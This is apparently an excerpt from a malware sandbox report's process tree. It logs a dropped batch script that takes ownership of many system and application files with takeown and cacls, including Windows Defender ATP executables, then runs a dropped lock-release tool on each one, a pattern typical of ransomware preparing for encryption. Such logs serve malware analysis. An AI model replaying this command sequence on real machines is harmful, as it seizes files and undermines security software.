- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui" /E /G Admin:F /C
    3⤵
    PID:5020
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui"
    3⤵
    PID:4848
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "msoeres.dll.mui" -nobanner
    3⤵
    PID:3092
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "msoeres.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:5016
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5140
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\AcroRdrDCUpd1901020069.msp""
  2⤵
  PID:5160
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\AcroRdrDCUpd1901020069.msp" /E /G Admin:F /C
    3⤵
    PID:5204
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\AcroRdrDCUpd1901020069.msp"
    3⤵
    - Modifies file permissions
    PID:5220
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "AcroRdrDCUpd1901020069.msp" -nobanner
    3⤵
    PID:5236
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "AcroRdrDCUpd1901020069.msp" -nobanner
      4⤵
      Executes dropped EXE
      PID:5248
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5268
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa""
  2⤵
  PID:5288
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:5332
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa"
    3⤵
    - Modifies file permissions
    PID:5348
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "classes.jsa" -nobanner
    3⤵
    PID:5364
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "classes.jsa" -nobanner
      4⤵
      Executes dropped EXE
      PID:5376
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5396
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""
  2⤵
  PID:5416
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C
    3⤵
    PID:5460
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"
    3⤵
    - Modifies file permissions
    PID:5476
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
    3⤵
    PID:5492
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
      4⤵
      Executes dropped EXE
      PID:5504
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5524
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""
  2⤵
  PID:5540
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C
    3⤵
    PID:5584
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"
    3⤵
    - Modifies file permissions
    PID:5600
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "background.png" -nobanner
    3⤵
    PID:5616
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "background.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:5628
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5644
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd""
  2⤵
  PID:5660
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd" /E /G Admin:F /C
    3⤵
    PID:5704
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd"
    3⤵
    - Modifies file permissions
    PID:5720
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner
    3⤵
    PID:5736
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner
      4⤵
      Executes dropped EXE
      PID:5748
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5764
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui""
  2⤵
  PID:5780
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui" /E /G Admin:F /C
    3⤵
    PID:5824
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui"
    3⤵
    - Modifies file permissions
    PID:5840
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "WinMail.exe.mui" -nobanner
    3⤵
    PID:5856
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "WinMail.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:5868
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5884
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""
  2⤵
  PID:5900
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C
    3⤵
    PID:5944
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"
    3⤵
    - Modifies file permissions
    PID:5960
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "device.png" -nobanner
    3⤵
    PID:5976
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "device.png" -nobanner
      4⤵
      PID:5988
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6004
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.cert.json""
  2⤵
  PID:6020
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.cert.json" /E /G Admin:F /C
    3⤵
    PID:6064
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.cert.json"
    3⤵
    - Modifies file permissions
    PID:6080
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "utc.cert.json" -nobanner
    3⤵
    PID:6096
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "utc.cert.json" -nobanner
      4⤵
      PID:6108
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6124
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd""
  2⤵
  PID:6140
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd" /E /G Admin:F /C
    3⤵
    PID:4416
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd"
    3⤵
    - Modifies file permissions
    PID:4884
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner
    3⤵
    PID:4928
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner
      4⤵
      PID:5212
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5224
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe""
  2⤵
  PID:5264
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe" /E /G Admin:F /C
    3⤵
    PID:5188
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe"
    3⤵
    - Modifies file permissions
    PID:5168
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "MsSense.exe" -nobanner
    3⤵
    PID:5336
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "MsSense.exe" -nobanner
      4⤵
      PID:5356
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5380
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""
  2⤵
  PID:5412
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:5296
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    PID:5464
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:5512
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:5516
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5532
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.jfm""
  2⤵
  PID:5440
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.jfm" /E /G Admin:F /C
    3⤵
    PID:5612
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.jfm"
    3⤵
    - Modifies file permissions
    PID:5636
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "vedatamodel.jfm" -nobanner
    3⤵
    PID:5656
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "vedatamodel.jfm" -nobanner
      4⤵
      PID:5564
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5544
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin""
  2⤵
  PID:5548
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin" /E /G Admin:F /C
    3⤵
    PID:5744
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin"
    3⤵
    - Modifies file permissions
    PID:5768
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "TileCache_100_0_Header.bin" -nobanner
    3⤵
    PID:5688
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "TileCache_100_0_Header.bin" -nobanner
      4⤵
      PID:5692
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5836
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Program Files (x86)\Windows Mail\wab.exe""
  2⤵
  PID:5844
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\wab.exe" /E /G Admin:F /C
    3⤵
    PID:5816
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\wab.exe"
    3⤵
    - Modifies file permissions
    PID:5812
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "wab.exe" -nobanner
    3⤵
    PID:5952
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "wab.exe" -nobanner
      4⤵
      PID:5972
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5996
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Program Files\Windows Defender Advanced Threat Protection\SenseSampleUploader.exe""
  2⤵
  PID:6016
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Defender Advanced Threat Protection\SenseSampleUploader.exe" /E /G Admin:F /C
    3⤵
    PID:5908
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Defender Advanced Threat Protection\SenseSampleUploader.exe"
    3⤵
    - Modifies file permissions
    PID:4708
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "SenseSampleUploader.exe" -nobanner
    3⤵
    PID:4732
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "SenseSampleUploader.exe" -nobanner
      4⤵
      PID:4720
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6068
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe""
  2⤵
  PID:6112
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe" /E /G Admin:F /C
    3⤵
    PID:6048
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe"
    3⤵
    - Modifies file permissions
    PID:6036
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "BrowserCore.exe" -nobanner
    3⤵
    PID:4524
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "BrowserCore.exe" -nobanner
      4⤵
      PID:5040
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5208
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""
  2⤵
  PID:5260
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C
    3⤵
    PID:5276
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"
    3⤵
    - Modifies file permissions
    PID:5340
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "background.png" -nobanner
    3⤵
    PID:5388
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "background.png" -nobanner
      4⤵
      PID:5360
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5272
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\AutoLogger-Diagtrack-Listener.etl""
  2⤵
  PID:5244
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\AutoLogger-Diagtrack-Listener.etl" /E /G Admin:F /C
    3⤵
    PID:5484
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\AutoLogger-Diagtrack-Listener.etl"
    3⤵
    - Modifies file permissions
    PID:5520
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "AutoLogger-Diagtrack-Listener.etl" -nobanner
    3⤵
    PID:5528
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "AutoLogger-Diagtrack-Listener.etl" -nobanner
      4⤵
      PID:5320
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5308
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00001.jrs""
  2⤵
  PID:5640
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00001.jrs" /E /G Admin:F /C
    3⤵
    PID:5556
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00001.jrs"
    3⤵
    - Modifies file permissions
    PID:5592
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "edbres00001.jrs" -nobanner
    3⤵
    PID:5432
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "edbres00001.jrs" -nobanner
      4⤵
      PID:5420
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5772
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Program Files (x86)\Windows Mail\WinMail.exe""
  2⤵
  PID:5676
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\WinMail.exe" /E /G Admin:F /C
    3⤵
    PID:5724
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\WinMail.exe"
    3⤵
    PID:5716
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "WinMail.exe" -nobanner
    3⤵
    PID:5804
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "WinMail.exe" -nobanner
      4⤵
      PID:5912
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5968
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin""
  2⤵
  PID:5980
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin" /E /G Admin:F /C
    3⤵
    PID:5872
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin"
    3⤵
    - Modifies file permissions
    PID:6032
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "KnownGameList.bin" -nobanner
    3⤵
    PID:6072
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "KnownGameList.bin" -nobanner
      4⤵
      PID:4888
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6092
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H""
  2⤵
  PID:5904
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H" /E /G Admin:F /C
    3⤵
    PID:5136
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H"
    3⤵
    PID:2016
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "Identity-H" -nobanner
    3⤵
    PID:5172
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "Identity-H" -nobanner
      4⤵
      PID:6056
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6136
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""
  2⤵
  PID:5180
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:5184
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"
    3⤵
    PID:5124
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:5152
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:5144
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5500
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""
  2⤵
  PID:5316
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C
    3⤵
    PID:5472
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"
    3⤵
    - Modifies file permissions
    PID:5240
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "overlay.png" -nobanner
    3⤵
    PID:5560
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "overlay.png" -nobanner
      4⤵
      PID:5424
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5708
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.tracing.json""
  2⤵
  PID:5700
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.tracing.json" /E /G Admin:F /C
    3⤵
    PID:5680
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.tracing.json"
    3⤵
    - Modifies file permissions
    PID:4428
- - C:\Windows\SysWOW64\cmd.exe
